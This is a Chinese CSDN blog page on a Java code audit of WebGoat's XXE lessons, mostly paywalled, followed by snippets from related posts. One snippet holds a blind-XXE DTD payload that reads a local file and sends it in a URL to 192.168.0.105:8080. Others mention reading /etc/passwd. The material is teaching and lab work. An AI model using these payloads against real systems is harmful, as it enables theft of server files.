Java代码审计——WebGoat XML外部实体注入(XXE)

最新推荐文章于 2024-05-29 07:48:21 发布
最新推荐文章于 2024-05-29 07:48:21 发布
阅读量784 收藏
点赞数
分类专栏: Java安全代码审计分析 文章标签: xml web安全 安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61506558/article/details/127859053
版权
本文详细介绍了Java中WebGoat项目中的XML外部实体注入(XXE)漏洞,从概念到实战,包括漏洞原理、安全代码示例、现代REST框架中的XXE风险、盲XXE及DDoS攻击的实现。通过代码分析和解题过程,展示了如何防止XXE攻击。
摘要由CSDN通过智能技术生成

目录

前言:

0x01 Let’s try

 0x02 代码分析

2.1 安全的代码

0x03  Modern REST framework

3.1 解题:

3.2  改为xml格式:

3.3 源码分析:

3.4 参考解决方案

0x04 Blind XXE assignment

0x05XXE DOS attack

参考文章:

前言:

        在进行代码分析之前,要先懂漏洞产生的原理,不妨看看这篇文章,WebGoat上面描述的也不错,值得研读。

 

0x01 Let’s try

我们直接来看一下题目

题目的意思是让我们列出root下的文件,可以看到这里只有一个评论的功能

了解本专栏 订阅专栏 解锁全文 超级会员免费看
@Camelus
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
Java代码审计——XML 外部实体注入XXE
m0_61506558的博客
11-27 1100
XXEXML 外部实体注入。当应用程序在解析 XML 输入时,在没有禁止外部实体的加载而导致加载了外部文驱动程序所必需的接口,其允许应用程序设置和查询解析器中的功能和属性、注册文档处理的事件处理程序,以及开始文档解析。当XMLReader 使用默认的解析方法并且未对。输入时,在没有禁止外部实体的加载而导致加载了外部文件及代码时,就会造成 XXE。文档的接口,其存在于公共区域中。XMLReader 接口是。XMLReader 接口是一种通过。漏洞,我们首先需要知道常见的能够解析。们一般用以下几种常见的。
xml 设值注入举例ref_XML外部实体注入
weixin_39873177的博客
11-21 314
一、XML基础知识XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。DTD(文档类型定义)的作用是定义 XML 文档的合法构建模块。DTD 可以在 XML 文档内声明,也可以外部引用。内部声明DTD<!DOCTYPE 根元素 [元素声明]>引...
xml实体注入代码Java_XML实体注入漏洞
weixin_32430445的博客
02-27 633
XML实体注入漏洞测试代码1:新建xmlget.php,复制下面代码漏洞测试利用方式1:有回显,直接读取文件LINUX:读取passwd文件,需URL编码后执行。windows:读取文件、也可以读取到内容D盘的文件夹,形式如:file:///d:/URL编码后可执行:http://192.168.106.208/xxe1.php?xml=%3C%3Fxml%20version%3D%221.0%...
Java代码审计安全篇-XXE(XML外部实体注入)漏洞
最新发布
dzqxwzoe的博客
05-29 1080
XML 实体允许定义标记,在分析 XML 文档时,这些标记将被内容替换。通常有三种类型的实体:内部实体外部实体参数实体。必须在文档类型定义 (DTD) 中创建一个实体,让我们从一个示例开始:正如你所看到的,一旦XML文档被解析器处理,它就会用定义的常量“JoSmith”替换定义的实体。正如你所看到的,这有很多优点,因为你可以在一个地方更改为例如“约翰史密斯”。js ``js在 Java 应用程序中,XML 可用于将数据从客户端获取到服务器,我们都熟悉 JSON API,我们也可以使用 xml
XXE (XML External Entity Injection) :XML外部实体注入
weixin_33843409的博客
07-18 194
XXE (XML External Entity Injection) 0x01 什么是XXE XML外部实体注入 若是PHP,libxml_disable_entity_loader设置为TRUE可禁用外部实体注入 0x02 XXE利用 简单文件读取 基于file协议的XXE攻击 XMLInject.php <?php #Enable...
【网络安全JAVA代码审计—— XXE外部实体注入
HBohan的博客
01-14 1142
想要了解XXE,在那之前需要了解XML的相关基础
Java代码审计——WebGoat XSS
m0_61506558的博客
11-18 648
我们需要对其进行控制。也就是说,想要触发该 XSS 漏洞,首先得将包含 XSS 有效载荷的数据插入数据库中。到此漏洞的整个执行流程我们已分析完成,接下来便是找到对应的入口进行触发,而触发该漏洞一个最大的问题是:数据来源于。我们先updatecert一下,发现红框中的数据直接输出了所以我们直接进行xss即可。因为程序没有对输入进行任何校验,所以只需找到添加数据的路由后插入对应的有效载荷。下面两种形式的写法实现的效果是相同的,都是将变量输出到网页中。中的调用可以跟踪到调用类,在类中可以发现,程序首先对“
JAVA代码审计——WebGoat 认证缺陷
m0_61506558的博客
11-11 446
通过上次对SQL注入的简单审计,我们大致上对Java代码的思路有了一定的认识,紧接着要进入JAVA代码审计——SQL注入靶场审计01_jinyouxin的博客-CSDN博客Java代码审计WebGoat—— 登录注册模块初审计_jinyouxin的博客-CSDN博客(一)Authentication Bypasses开发人员不应在JWT中暴露敏感信息,可使用工具将截获的JWT解析查看是否包含敏感信息。JWT弱口令爆破可以离线进行。
代码审计(Java)——WebGoat_Xss
weixin_45260839的博客
08-16 673
代码审计(Java)——WebGoat_Xss
Java代码审计——WebGoat CSRF (上)
m0_61506558的博客
12-02 567
CSRF(Cross Site Request Forgery,跨站点请求伪造)是目前出现次数比较多的漏洞,该漏洞能够使攻击者盗用被攻击者的身份信息,去执行相关敏感操作。实际上这种方式是攻击者通过一些钓鱼等手段欺骗用户去访问一个自己曾经认证过的网站,然后执行一些操作(如后台管理、发消息、添加关注甚至是转账等行为)。由于浏览器曾经认证过,因此被访问的网站会认为是真正的用户操作而去运行。简而言之,CSRF 漏洞的工作原理是攻击者盗用了用户的身份,以用户的名义发送恶意请求。
XML外部实体注入基础
qq_63928796的博客
12-06 528
xml xml的优点 xml是互联网数据传输的重要工具,它可以跨越互联网任何的平台,不受编程语言和操作系统的限制,非常适合Web传输,而且xml有助于在服务器之间穿梭结构化数据,方便开发人员控制数据的存储和传输。 而且在配置文件里边所有的配置文件都是以XMl的格式来编写的,跨平台进行数据交互,它可以跨操作系统,也可以跨编程语言的平台,所以可以看出XML是非常方便的,应用的范围也很广,但如果存在漏洞,那危害就不言而喻了 dtd Document Type Definition文档类型定义 https://
XXEXML外部实体注入
一个普普通通的博客
04-18 913
XXE
xml外部实体注入XXE
songbai220
12-10 322
XXE(xml外部实体注入) XML External Entity XXE介绍 XXE原理 建立*.dtd <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/1.txt"> <!ENTITY % int "<!ENTITY % send SYSTEM 'http://192.168.0.105:8080?p=%file;'>"> 运维人
WebGoat (A4) XML External Entities (XXE)
箭雨镜屋
03-15 2282
第4页 这题要求用XXE注入罗列系统根目录。 首先在上图的输入框输入个评论,比如cute,按submit提交。 到burpsuite的proxy模块找到相关request报文,鼠标右键--send to repeater 从上图可见,<text></text>标签之前的内容是会显示在评论区的,因此如果在此处引用外部实体外部实体的内容也是可以显示在评论区的。 在request报文中的xml代码中增加DTD,并在其中定义外部实体root,其内容是"file:///",
Webgoat --XEE
hee_mee的博客
06-15 495
ZeroNIl
XXE - XML外部实体注入攻击
javaEE_zero的博客
01-04 613
XXE漏洞、XML外部实体注入攻击
WebGoat 8.0 XXE注入 解题思路
Abracadabra的专栏
09-20 4317
WebGoat 8.0 XXE注入 解题思路 ★ 题目 地址: http://127.0.0.1:8080/WebGoat/start.mvc#lesson/XXE.lesson/2 ★ XXE 注入攻击是什么 XXEXML External Entity的缩写。 XXE注入攻击,发生在一些配置较弱的XML解析器中。XXE攻击可以导致隐私数据泄露、拒绝服务、服务端请求伪造、端口扫描等问题。...
WebGoat8实验:XXE注入漏洞详解与利用
WebGoat8的实验中,XXE注入通常涉及利用XML解析器的外部实体来获取敏感信息或干扰服务器操作。在1.1部分,实验展示了如何利用评论功能来读取系统文件,例如`/etc/passwd`。攻击者通过构造特殊的XML请求包,将XML...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

@Camelus

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值